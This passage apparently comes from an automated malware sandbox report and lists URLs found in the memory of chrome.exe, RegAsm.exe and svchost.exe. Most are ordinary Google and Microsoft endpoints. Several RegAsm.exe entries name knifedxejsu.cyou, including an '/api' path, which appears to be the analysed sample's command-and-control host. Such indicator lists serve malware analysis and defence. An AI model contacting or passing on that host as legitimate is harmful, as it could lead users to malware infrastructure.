Source: chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaultt
Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134172551.000009B400AC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.69
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3skwo2srs5xchyxzz6ujgnedha_9.52.0/gcmj
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/clxypm5qigkf6w4j3sn2c4jnx4_474/lmelglejh
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/g
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/ne
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://encrypted-tbn0.gstatic.com/faviconV2?url=https://rest.co.il&client=PASSWORD_MANAGER&size=16&
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://encrypted-tbn2.gstatic.com/faviconV2?url=https://login.live.com&client=PASSWORD_MANAGER&size
Source: chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=searchTerms
Source: chrome.exe, 00000008.00000003.941328351.000009B000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000008.00000003.941328351.000009B000514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-query.fastly-edge.com/htt
Source: chrome.exe, 00000008.00000003.941328351.000009B000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000008.00000003.941328351.000009B000514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129316003.000009B400004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129802105.000009B4000F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&adk=181227
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot
Source: chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=90&slotn
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20190131/zrt_lookup.html
Source: chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/xbbe/pixel?d=CICfxAEQ7KXQkAIY7dHaqQEwAQ&v=APEucNV8Higyb1mdtfCkDQ
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942427852.000009B0005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942528995.000009B0005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942742503.000009B0005CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985730131.000009B4019E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://id.google.com/verify/AHEVGRyC3pWiEkDFk51d8RP7UIjkTyE_nwnEdiGWeZcAZ3w9aCxwqVafJluPRzvqwYSI2Kr
Source: chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/292285899
Source: chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/349489248
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292
Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140833525.000009B4016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134871796.000009B400C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: RegAsm.exe, 00000007.00000002.1062369074.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/
Source: RegAsm.exe, 00000007.00000002.1062369074.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/6z
Source: RegAsm.exe, 00000007.00000002.1062369074.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/Zy
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1062635600.0000000000B99000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1061747097.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1062957881.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/api
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/apiw
Source: RegAsm.exe, 00000007.00000002.1062369074.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/s
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985730131.000009B4019E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/gen204
Source: chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401AE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://live.com
Source: chrome.exe, 00000008.00000002.2130491850.000009B400248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133612138.000009B40099C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2131403853.000009B400474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136003376.000009B400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129942611.000009B40012C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138756692.000009B4012AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1875533897.000009B4012AA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139760290.000009B40141C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: chrome.exe, 00000008.00000002.2131403853.000009B400474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129942611.000009B40012C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/0
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/0BJP
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136003376.000009B400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137770733.000009B401130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985730131.000009B4019E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985825773.000009B4019F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1162649249.000009B401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985785507.000009B4019E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139410870.000009B4013A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://microsoftonline.com
Source: chrome.exe, 00000008.00000002.2140605622.000009B4015A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134461361.000009B400B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135364167.000009B400D64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942427852.000009B0005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942528995.000009B0005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.942742503.000009B0005CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000008.00000003.970199396.000009B4011D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134978060.000009B400C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myshop.amplify.com/cart
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125122119.000001EE12296000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.com
